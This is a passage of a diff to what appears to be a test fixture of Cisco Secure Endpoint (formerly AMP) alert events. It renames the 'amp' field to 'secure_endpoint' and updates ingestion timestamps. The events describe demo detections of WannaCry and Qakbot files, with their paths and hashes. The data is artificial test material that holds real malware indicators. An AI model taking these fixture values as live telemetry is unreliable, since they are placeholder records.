Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -501,7 +501,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -567,7 +567,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111145703Z",
+                "ingested": "2021-09-27T00:41:58.139829673Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -577,7 +577,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -638,7 +638,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111147798Z",
+                "ingested": "2021-09-27T00:41:58.139831423Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -648,7 +648,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -729,7 +729,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111149933Z",
+                "ingested": "2021-09-27T00:41:58.139833185Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -740,7 +740,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -818,7 +818,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111152028Z",
+                "ingested": "2021-09-27T00:41:58.139834952Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -829,7 +829,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -891,7 +891,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111154118Z",
+                "ingested": "2021-09-27T00:41:58.139836714Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -901,7 +901,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -962,7 +962,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111156357Z",
+                "ingested": "2021-09-27T00:41:58.139838699Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -972,7 +972,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1037,7 +1037,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111158472Z",
+                "ingested": "2021-09-27T00:41:58.139840499Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1047,7 +1047,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1112,7 +1112,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111160543Z",
+                "ingested": "2021-09-27T00:41:58.139842238Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1122,7 +1122,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1187,7 +1187,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111162637Z",
+                "ingested": "2021-09-27T00:41:58.139843965Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -1197,7 +1197,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1264,7 +1264,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111164728Z",
+                "ingested": "2021-09-27T00:41:58.139845709Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1275,7 +1275,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1347,7 +1347,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111166874Z",
+                "ingested": "2021-09-27T00:41:58.139847573Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1358,7 +1358,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1426,7 +1426,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111168956Z",
+                "ingested": "2021-09-27T00:41:58.139849337Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1437,7 +1437,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1505,7 +1505,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111171040Z",
+                "ingested": "2021-09-27T00:41:58.139851089Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1516,7 +1516,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1578,7 +1578,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111173128Z",
+                "ingested": "2021-09-27T00:41:58.139852831Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1588,7 +1588,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1653,7 +1653,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111175203Z",
+                "ingested": "2021-09-27T00:41:58.139854563Z",
